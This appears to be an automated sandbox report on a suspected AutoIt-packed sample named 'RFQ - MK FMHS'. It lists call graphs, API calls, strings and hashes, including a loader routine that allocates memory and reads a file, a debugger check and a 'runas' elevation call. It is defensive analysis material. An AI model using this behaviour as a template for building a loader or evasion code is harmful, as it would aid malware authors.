GetCurrentProcess TerminateProcess 99829->99830 99830->99822 99831->99828 99833 e9a714 EncodePointer 99832->99833 99833->99833 99834 e9a72e 99833->99834 99834->99764 99836 e99e4b __lock 58 API calls 99835->99836 99837 e935b7 DecodePointer EncodePointer 99836->99837 99900 e99fb5 LeaveCriticalSection 99837->99900 99839 e749a7 99840 e93614 99839->99840 99841 e93638 99840->99841 99842 e9361e 99840->99842 99841->99773 99842->99841 99901 e98d68 58 API calls __getptd_noexit 99842->99901 99844 e93628 99902 e98ff6 9 API calls _fseek 99844->99902 99846 e93633 99846->99773 99847->99775 99849 e73b59 __ftell_nolock 99848->99849 99850 e777c7 59 API calls 99849->99850 99851 e73b63 GetCurrentDirectoryW 99850->99851 99903 e73778 99851->99903 99853 e73b8c IsDebuggerPresent 99854 ead4ad MessageBoxA 99853->99854 99855 e73b9a 99853->99855 99858 ead4c7 99854->99858 99856 e73c73 99855->99856 99855->99858 99859 e73bb7 99855->99859 99857 e73c7a SetCurrentDirectoryW 99856->99857 99862 e73c87 Mailbox 99857->99862 100102 e77373 59 API calls Mailbox 99858->100102 99984 e773e5 99859->99984 99900->99839 99901->99844 99902->99846 99904 e777c7 59 API calls 99903->99904 99905 e7378e 99904->99905 100111 e73d43 99905->100111 99907 e737ac 99908 e74864 61 API calls 99907->99908 99909 e737c0 99908->99909 99910 e77f41 59 API calls 99909->99910 99911 e737cd 99910->99911 99912 e74f3d 136 API calls 99911->99912 99913 e737e6 99912->99913 99914 ead3ae 99913->99914 99915 e737ee Mailbox 99913->99915 100153 ed97e5 99914->100153 99919 e781a7 59 API calls 99915->99919 99918 ead3cd 99921 e92f95 _free 58 API calls 99918->99921 99922 e73801 99919->99922 99920 e74faa 84 API calls 99920->99918 99923 ead3da 99921->99923 100125 e793ea 99922->100125 99925 e74faa 84 API calls 99923->99925 99927 ead3e3 99925->99927 99931 e73ee2 59 API calls 99927->99931 99928 e77f41 59 API calls 99929 e7381a 99928->99929 99930 e78620 69 API calls 99929->99930 99932 e7382c Mailbox 99930->99932 99933 ead3fe 99931->99933 99934 e77f41 59 API calls 99932->99934 99935 e73ee2 59 API calls 99933->99935 99936 e73852 99934->99936 99937 ead41a 99935->99937 99938 e78620 69 API calls 99936->99938 99939 e74864 61 API calls 99937->99939 99941 e73861 Mailbox 99938->99941 99940 ead43f 99939->99940 99942 e73ee2 59 API calls 99940->99942 99944 e777c7 59 API calls 99941->99944 99943 ead44b 99942->99943 99945 e781a7 59 API calls 99943->99945 99946 e7387f 99944->99946 99947 ead459 99945->99947 100128 e73ee2 99946->100128 99949 e73ee2 59 API calls 99947->99949 99951 ead468 99949->99951 99957 e781a7 59 API calls 99951->99957 99953 e73899 99953->99927 99954 e738a3 99953->99954 99955 e9313d _W_store_winword 60 API calls 99954->99955 99956 e738ae 99955->99956 99956->99933 99958 e738b8 99956->99958 99959 ead48a 99957->99959 99960 e9313d _W_store_winword 60 API calls 99958->99960 99961 e73ee2 59 API calls 99959->99961 99962 e738c3 99960->99962 99963 ead497 99961->99963 99962->99937 99964 e738cd 99962->99964 99963->99963 99965 e9313d _W_store_winword 60 API calls 99964->99965 99966 e738d8 99965->99966 99966->99951 99967 e73919 99966->99967 99969 e73ee2 59 API calls 99966->99969 99967->99951 99968 e73926 99967->99968 99970 e7942e 59 API calls 99968->99970 99971 e738fc 99969->99971 99972 e73936 99970->99972 99973 e781a7 59 API calls 99971->99973 99974 e791b0 59 API calls 99972->99974 99975 e7390a 99973->99975 99976 e73944 99974->99976 99977 e73ee2 59 API calls 99975->99977 100144 e79040 99976->100144 99977->99967 99979 e793ea 59 API calls 99981 e73961 99979->99981 99980 e79040 60 API calls 99980->99981 99981->99979 99981->99980 99982 e73ee2 59 API calls 99981->99982 99983 e739a7 Mailbox 99981->99983 99982->99981 99983->99853 99985 e773f2 __ftell_nolock 99984->99985 100112 e73d50 __ftell_nolock 100111->100112 100113 e77d2c 59 API calls 100112->100113 100118 e73eb6 Mailbox 100112->100118 100115 e73d82 100113->100115 100114 e77b52 59 API calls 100114->100115 100115->100114 100124 e73db8 Mailbox 100115->100124 100116 e77b52 59 API calls 100116->100124 100117 e73e89 100117->100118 100119 e77f41 59 API calls 100117->100119 100118->99907 100121 e73eaa 100119->100121 100120 e77f41 59 API calls 100120->100124 100122 e73f84 59 API calls 100121->100122 100122->100118 100124->100116 100124->100117 100124->100118 100124->100120 100188 e73f84 100124->100188 100126 e90ff6 Mailbox 59 API calls 100125->100126 100127 e7380d 100126->100127 100127->99928 100129 e73f05 100128->100129 100130 e73eec 100128->100130 100132 e77d2c 59 API calls 100129->100132 100131 e781a7 59 API calls 100130->100131 100133 e7388b 100131->100133 100132->100133 100134 e9313d 100133->100134 100135 e93149 100134->100135 100136 e931be 100134->100136 100143 e9316e 100135->100143 100194 e98d68 58 API calls __getptd_noexit 100135->100194 100196 e931d0 60 API calls 3 library calls 100136->100196 100139 e931cb 100139->99953 100140 e93155 100195 e98ff6 9 API calls _fseek 100140->100195 100142 e93160 100142->99953 100143->99953 100145 eaf5a5 100144->100145 100148 e79057 100144->100148 100145->100148 100198 e78d3b 59 API calls Mailbox 100145->100198 100147 e7915f 100147->99981 100148->100147 100149 e791a0 100148->100149 100150 e79158 100148->100150 100197 e79e9c 60 API calls Mailbox 100149->100197 100152 e90ff6 Mailbox 59 API calls 100150->100152 100152->100147 100154 e75045 85 API calls 100153->100154 100155 ed9854 100154->100155 100156 ed99be 96 API calls 100155->100156 100157 ed9866 100156->100157 100158 e7506b 74 API calls 100157->100158 100185 ead3c1 100157->100185 100159 ed9881 100158->100159 100160 e7506b 74 API calls 100159->100160 100161 ed9891 100160->100161 100162 e7506b 74 API calls 100161->100162 100163 ed98ac 100162->100163 100164 e7506b 74 API calls 100163->100164 100165 ed98c7 100164->100165 100166 e75045 85 API calls 100165->100166 100167 ed98de 100166->100167 100168 e9594c __crtLCMapStringA_stat 58 API calls 100167->100168 100169 ed98e5 100168->100169 100170 e9594c __crtLCMapStringA_stat 58 API calls 100169->100170 100171 ed98ef 100170->100171 100172 e7506b 74 API calls 100171->100172 100173 ed9903 100172->100173 100174 ed9393 GetSystemTimeAsFileTime 100173->100174 100175 ed9916 100174->100175 100176 ed992b 100175->100176 100177 ed9940 100175->100177 100178 e92f95 _free 58 API calls 100176->100178 100179 ed99a5 100177->100179 100180 ed9946 100177->100180 100182 ed9931 100178->100182 100181 e92f95 _free 58 API calls 100179->100181 100183 ed8d90 116 API calls 100180->100183 100181->100185 100186 e92f95 _free 58 API calls 100182->100186 100184 ed999d 100183->100184 100187 e92f95 _free 58 API calls 100184->100187 100185->99918 100185->99920 100186->100185 100187->100185 100189 e73f92 100188->100189 100193 e73fb4 _memmove 100188->100193 100191 e90ff6 Mailbox 59 API calls 100189->100191 100190 e90ff6 Mailbox 59 API calls 100192 e73fc8 100190->100192 100191->100193 100192->100124 100193->100190 100194->100140 100195->100142 100196->100139 100197->100147 100198->100148 100486 e7107d 100491 e771eb 100486->100491 100488 e7108c 100489 e92f80 __cinit 67 API calls 100488->100489 100490 e71096 100489->100490 100492 e771fb __ftell_nolock 100491->100492 100493 e777c7 59 API calls 100492->100493 100494 e772b1 100493->100494 100495 e74864 61 API calls 100494->100495 100496 e772ba 100495->100496 100522 e9074f 100496->100522 100499 e77e0b 59 API calls 100500 e772d3 100499->100500 100501 e73f84 59 API calls 100500->100501 100502 e772e2 100501->100502 100503 e777c7 59 API calls 100502->100503 100504 e772eb 100503->100504 100505 e77eec 59 API calls 100504->100505 100506 e772f4 RegOpenKeyExW 100505->100506 100507 eaecda RegQueryValueExW 100506->100507 100508 e77316 Mailbox 100506->100508 100509 eaed6c RegCloseKey 100507->100509 100510 eaecf7 100507->100510 100508->100488 100509->100508 100521 eaed7e _wcscat Mailbox __NMSG_WRITE 100509->100521 100511 e90ff6 Mailbox 59 API calls 100510->100511 100512 eaed10 100511->100512 100513 e7538e 59 API calls 100512->100513 100514 eaed1b RegQueryValueExW 100513->100514 100515 eaed38 100514->100515 100518 eaed52 100514->100518 100516 e77d2c 59 API calls 100515->100516 100516->100518 100517 e77b52 59 API calls 100517->100521 100518->100509 100519 e77f41 59 API calls 100519->100521 100520 e73f84 59 API calls 100520->100521 100521->100508 100521->100517 100521->100519 100521->100520 100523 ea1b90 __ftell_nolock 100522->100523 100524 e9075c GetFullPathNameW 100523->100524 100525 e9077e 100524->100525 100526 e77d2c 59 API calls 100525->100526 100527 e772c5 100526->100527 100527->100499 100528 e5295b 100531 e525d0 100528->100531 100530 e529a7 100532 e50000 GetPEB 100531->100532 100541 e5266f 100532->100541 100534 e526a0 CreateFileW 100540 e526ad 100534->100540 100534->100541 100535 e526c9 VirtualAlloc 100536 e526ea ReadFile 100535->100536 100535->100540 100539 e52708 VirtualAlloc 100536->100539 100536->100540 100537 e528bc VirtualFree 100538 e528ca 100537->100538 100538->100530 100539->100540 100539->100541 100540->100537 100540->100538 100541->100535 100541->100540 100542 e527d0 FindCloseChangeNotification 100541->100542 100543 e527e0 VirtualFree 100541->100543 100544 e534e0 GetPEB 100541->100544 100542->100541 100543->100541 100545 e5350a 100544->100545 100545->100534

                    Executed Functions

                    Function 00E73B4C Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 153windowCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    APIs
                    • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00E73B7A
                    • IsDebuggerPresent.KERNEL32 ref: 00E73B8C
                    • GetFullPathNameW.KERNEL32(00007FFF,?,?,00F362F8,00F362E0,?,?), ref: 00E73BFD
                      • Part of subcall function 00E77D2C: _memmove.LIBCMT ref: 00E77D66
                      • Part of subcall function 00E80A8D: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00E73C26,00F362F8,?,?,?), ref: 00E80ACE
                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00E73C81
                    • MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,00F293F0,00000010), ref: 00EAD4BC
                    • SetCurrentDirectoryW.KERNEL32(?,00F362F8,?,?,?), ref: 00EAD4F4
                    • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00F25D40,00F362F8,?,?,?), ref: 00EAD57A
                    • ShellExecuteW.SHELL32(00000000,?,?), ref: 00EAD581
                      • Part of subcall function 00E73A58: GetSysColorBrush.USER32(0000000F), ref: 00E73A62
                      • Part of subcall function 00E73A58: LoadCursorW.USER32(00000000,00007F00), ref: 00E73A71
                      • Part of subcall function 00E73A58: LoadIconW.USER32(00000063), ref: 00E73A88
                      • Part of subcall function 00E73A58: LoadIconW.USER32(000000A4), ref: 00E73A9A
                      • Part of subcall function 00E73A58: LoadIconW.USER32(000000A2), ref: 00E73AAC
                      • Part of subcall function 00E73A58: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00E73AD2
                      • Part of subcall function 00E73A58: RegisterClassExW.USER32(?), ref: 00E73B28
                      • Part of subcall function 00E739E7: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00E73A15
                      • Part of subcall function 00E739E7: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00E73A36
                      • Part of subcall function 00E739E7: ShowWindow.USER32(00000000,?,?), ref: 00E73A4A
                      • Part of subcall function 00E739E7: ShowWindow.USER32(00000000,?,?), ref: 00E73A53
                      • Part of subcall function 00E743DB: _memset.LIBCMT ref: 00E74401
                      • Part of subcall function 00E743DB: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00E744A6
                    Strings
                    • runas, xrefs: 00EAD575
                    • This is a third-party compiled AutoIt script., xrefs: 00EAD4B4
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
                    • String ID: This is a third-party compiled AutoIt script.$runas
                    • API String ID: 529118366-3287110873
                    • Opcode ID: 56bf86de8d7ac7d97d0f6a24fe828240e62edcafc3e8570d4341edd52fe2b4d8
                    • Instruction ID: 89162eab67880fdb0adf224d47e762a37e89c00e0948072590d2b4969f634bec
                    • Opcode Fuzzy Hash: 56bf86de8d7ac7d97d0f6a24fe828240e62edcafc3e8570d4341edd52fe2b4d8
                    • Instruction Fuzzy Hash: 4751F770908248BECF11EBB4DC059FEBBB9AF49314F04D069F459F62A2DA709605EB21
                    Function 00E74FE9 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 62COMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 942 e74fe9-e75001 CreateStreamOnHGlobal 943 e75003-e7501a FindResourceExW 942->943 944 e75021-e75026 942->944 945 eadd5c-eadd6b LoadResource 943->945 946 e75020 943->946 945->946 947 eadd71-eadd7f SizeofResource 945->947 946->944 947->946 948 eadd85-eadd90 LockResource 947->948 948->946 949 eadd96-eaddb4 948->949 949->946
                    APIs
                    • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00E74EEE,?,?,00000000,00000000), ref: 00E74FF9
                    • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00E74EEE,?,?,00000000,00000000), ref: 00E75010
                    • LoadResource.KERNEL32(?,00000000,?,?,00E74EEE,?,?,00000000,00000000,?,?,?,?,?,?,00E74F8F), ref: 00EADD60
                    • SizeofResource.KERNEL32(?,00000000,?,?,00E74EEE,?,?,00000000,00000000,?,?,?,?,?,?,00E74F8F), ref: 00EADD75
                    • LockResource.KERNEL32(N,?,?,00E74EEE,?,?,00000000,00000000,?,?,?,?,?,?,00E74F8F,00000000), ref: 00EADD88
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                    • String ID: SCRIPT$N
                    • API String ID: 3051347437-3852340653
                    • Opcode ID: 4b61f102d6c5de5b11fb31beb970298999b58c8f5fa74f068e24d0e9760c08c8
                    • Instruction ID: 87944d9b6fdc1e4cd7b27243a14ce688262cbb3c2d3dd8cdceb09bdbaa860c24
                    • Opcode Fuzzy Hash: 4b61f102d6c5de5b11fb31beb970298999b58c8f5fa74f068e24d0e9760c08c8
                    • Instruction Fuzzy Hash: 20115E75200700AFE7218B66DC58F677BB9EFC9B51F108568F40AA6260DBA1E804C660
                    Function 00E74AFE Relevance: 10.7, APIs: 7, Instructions: 223COMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 1006 e74afe-e74b5e call e777c7 GetVersionExW call e77d2c 1011 e74b64 1006->1011 1012 e74c69-e74c6b 1006->1012 1014 e74b67-e74b6c 1011->1014 1013 eadb90-eadb9c 1012->1013 1015 eadb9d-eadba1 1013->1015 1016 e74b72 1014->1016 1017 e74c70-e74c71 1014->1017 1019 eadba3 1015->1019 1020 eadba4-eadbb0 1015->1020 1018 e74b73-e74baa call e77e8c call e77886 1016->1018 1017->1018 1028 eadc8d-eadc90 1018->1028 1029 e74bb0-e74bb1 1018->1029 1019->1020 1020->1015 1022 eadbb2-eadbb7 1020->1022 1022->1014 1024 eadbbd-eadbc4 1022->1024 1024->1013 1026 eadbc6 1024->1026 1030 eadbcb-eadbce 1026->1030 1031 eadca9-eadcad 1028->1031 1032 eadc92 1028->1032 1029->1030 1033 e74bb7-e74bc2 1029->1033 1034 e74bf1-e74c08 GetCurrentProcess IsWow64Process 1030->1034 1035 eadbd4-eadbf2 1030->1035 1040 eadc98-eadca1 1031->1040 1041 eadcaf-eadcb8 1031->1041 1036 eadc95 1032->1036 1037 eadc13-eadc19 1033->1037 1038 e74bc8-e74bca 1033->1038 1042 e74c0d-e74c1e 1034->1042 1043 e74c0a 1034->1043 1035->1034 1039 eadbf8-eadbfe 1035->1039 1036->1040 1048 eadc1b-eadc1e 1037->1048 1049 eadc23-eadc29 1037->1049 1044 eadc2e-eadc3a 1038->1044 1045 e74bd0-e74bd3 1038->1045 1046 eadc08-eadc0e 1039->1046 1047 eadc00-eadc03 1039->1047 1040->1031 1041->1036 1050 eadcba-eadcbd 1041->1050 1051 e74c20-e74c30 call e74c95 1042->1051 1052 e74c89-e74c93 GetSystemInfo 1042->1052 1043->1042 1056 eadc3c-eadc3f 1044->1056 1057 eadc44-eadc4a 1044->1057 1053 eadc5a-eadc5d 1045->1053 1054 e74bd9-e74be8 1045->1054 1046->1034 1047->1034 1048->1034 1049->1034 1050->1040 1063 e74c32-e74c3f call e74c95 1051->1063 1064 e74c7d-e74c87 GetSystemInfo 1051->1064 1055 e74c56-e74c66 1052->1055 1053->1034 1062 eadc63-eadc78 1053->1062 1059 eadc4f-eadc55 1054->1059 1060 e74bee 1054->1060 1056->1034 1057->1034 1059->1034 1060->1034 1065 eadc7a-eadc7d 1062->1065 1066 eadc82-eadc88 1062->1066 1071 e74c76-e74c7b 1063->1071 1072 e74c41-e74c45 GetNativeSystemInfo 1063->1072 1067 e74c47-e74c4b 1064->1067 1065->1034 1066->1034 1067->1055 1069 e74c4d-e74c50 FreeLibrary 1067->1069 1069->1055 1071->1072 1072->1067
                    APIs
                    • GetVersionExW.KERNEL32(?), ref: 00E74B2B
                      • Part of subcall function 00E77D2C: _memmove.LIBCMT ref: 00E77D66
                    • GetCurrentProcess.KERNEL32(?,00EFFAEC,00000000,00000000,?), ref: 00E74BF8
                    • IsWow64Process.KERNEL32(00000000), ref: 00E74BFF
                    • GetNativeSystemInfo.KERNELBASE(00000000), ref: 00E74C45
                    • FreeLibrary.KERNEL32(00000000), ref: 00E74C50
                    • GetSystemInfo.KERNEL32(00000000), ref: 00E74C81
                    • GetSystemInfo.KERNEL32(00000000), ref: 00E74C8D
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
                    • String ID:
                    • API String ID: 1986165174-0
                    • Opcode ID: 012f9275ce96f2008752e526fa74909459ce09f3052bb8b5f4d821f7577c0554
                    • Instruction ID: 6075e8bda6a9558f34c3cf92215762ff3a2642fc31fd78938656d15bd4ffff77
                    • Opcode Fuzzy Hash: 012f9275ce96f2008752e526fa74909459ce09f3052bb8b5f4d821f7577c0554
                    • Instruction Fuzzy Hash: 5F91C57154E7C4DEC732CB6884511AAFFE4AF6A304B44999ED0CFA7A41D320F948D729
                    Function 00ED4696 Relevance: 4.5, APIs: 3, Instructions: 25fileCOMMON
                    Download Yara Rule
                    APIs
                    • GetFileAttributesW.KERNELBASE(?,00EAE7C1), ref: 00ED46A6
                    • FindFirstFileW.KERNELBASE(?,?), ref: 00ED46B7
                    • FindClose.KERNEL32(00000000), ref: 00ED46C7
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: FileFind$AttributesCloseFirst
                    • String ID:
                    • API String ID: 48322524-0
                    • Opcode ID: 192ea9ecf11093b9808cd724c989de7bba72780b1413100801a7282145008be3
                    • Instruction ID: ab3bcafd5a85c593a426c5c445e47f44fef6bcb6778d724cb23b73955f25bd4e
                    • Opcode Fuzzy Hash: 192ea9ecf11093b9808cd724c989de7bba72780b1413100801a7282145008be3
                    • Instruction Fuzzy Hash: 86E0D8714104005F52106738EC4D8FA775CDF96335F100716F936E12F0E7B09954C595
                    Function 00E7E800 Relevance: 2.4, Strings: 1, Instructions: 1102COMMON
                    Download Yara Rule
                    Strings
                    • Variable must be of type 'Object'., xrefs: 00EB428C
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID:
                    • String ID: Variable must be of type 'Object'.
                    • API String ID: 0-109567571
                    • Opcode ID: 21eddddd8a37a69fb52fa9645f97f97d4b1ba658dbaf49b7a0d26debae2e813b
                    • Instruction ID: c9f890ce1824f14ccf59f09e9f8be581d5d99f293e9f36affa78a491f34081aa
                    • Opcode Fuzzy Hash: 21eddddd8a37a69fb52fa9645f97f97d4b1ba658dbaf49b7a0d26debae2e813b
                    • Instruction Fuzzy Hash: B7A26B75A04205CFCB24CF58C481AAEB7B2FF58314F2495A9E91ABB352D731ED42CB91
                    Function 00E80B30 Relevance: 57.3, APIs: 27, Strings: 5, Instructions: 1300windowsleeptimeCOMMON
                    Download Yara Rule
                    APIs
                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00E80BBB
                    • timeGetTime.WINMM ref: 00E80E76
                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00E80FB3
                    • TranslateMessage.USER32(?), ref: 00E80FC7
                    • DispatchMessageW.USER32(?), ref: 00E80FD5
                    • Sleep.KERNEL32(0000000A), ref: 00E80FDF
                    • LockWindowUpdate.USER32(00000000,?,?), ref: 00E8105A
                    • DestroyWindow.USER32 ref: 00E81066
                    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00E81080
                    • Sleep.KERNEL32(0000000A,?,?), ref: 00EB52AD
                    • TranslateMessage.USER32(?), ref: 00EB608A
                    • DispatchMessageW.USER32(?), ref: 00EB6098
                    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00EB60AC
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: Message$DispatchPeekSleepTranslateWindow$DestroyLockTimeUpdatetime
                    • String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
                    • API String ID: 4003667617-3242690629
                    • Opcode ID: c1b381d43d3b2dea75a995ab5009b9b68a65e5adeb06f6b74db043913d244e8d
                    • Instruction ID: 3fee2f9fe86898ecad0a189ec015de27ed6f054d24cc2ef337d6ea1afe1fedc6
                    • Opcode Fuzzy Hash: c1b381d43d3b2dea75a995ab5009b9b68a65e5adeb06f6b74db043913d244e8d
                    • Instruction Fuzzy Hash: 3DB2D371608741DFD728DF24C884BABB7E5BF84308F14991DE49DA72A1DB71E849CB82
                    Function 00ED93DF Relevance: 19.8, APIs: 13, Instructions: 322fileCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    APIs
                      • Part of subcall function 00ED91E9: __time64.LIBCMT ref: 00ED91F3
                      • Part of subcall function 00E75045: _fseek.LIBCMT ref: 00E7505D
                    • __wsplitpath.LIBCMT ref: 00ED94BE
                      • Part of subcall function 00E9432E: __wsplitpath_helper.LIBCMT ref: 00E9436E
                    • _wcscpy.LIBCMT ref: 00ED94D1
                    • _wcscat.LIBCMT ref: 00ED94E4
                    • __wsplitpath.LIBCMT ref: 00ED9509
                    • _wcscat.LIBCMT ref: 00ED951F
                    • _wcscat.LIBCMT ref: 00ED9532
                      • Part of subcall function 00ED922F: _memmove.LIBCMT ref: 00ED9268
                      • Part of subcall function 00ED922F: _memmove.LIBCMT ref: 00ED9277
                    • _wcscmp.LIBCMT ref: 00ED9479
                      • Part of subcall function 00ED99BE: _wcscmp.LIBCMT ref: 00ED9AAE
                      • Part of subcall function 00ED99BE: _wcscmp.LIBCMT ref: 00ED9AC1
                    • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00ED96DC
                    • _wcsncpy.LIBCMT ref: 00ED974F
                    • DeleteFileW.KERNEL32(?,?), ref: 00ED9785
                    • CopyFileW.KERNELBASE(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00ED979B
                    • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00ED97AC
                    • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00ED97BE
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
                    • String ID:
                    • API String ID: 1500180987-0
                    • Opcode ID: 116fd77f483f6af37bc402f97a66c8cb8d15d8c42f7ca7a4c3480cc8ac412042
                    • Instruction ID: 7699e4e3aca10e86f840169b7945bb7079b7f4850cebe2bc187841a886f139be
                    • Opcode Fuzzy Hash: 116fd77f483f6af37bc402f97a66c8cb8d15d8c42f7ca7a4c3480cc8ac412042
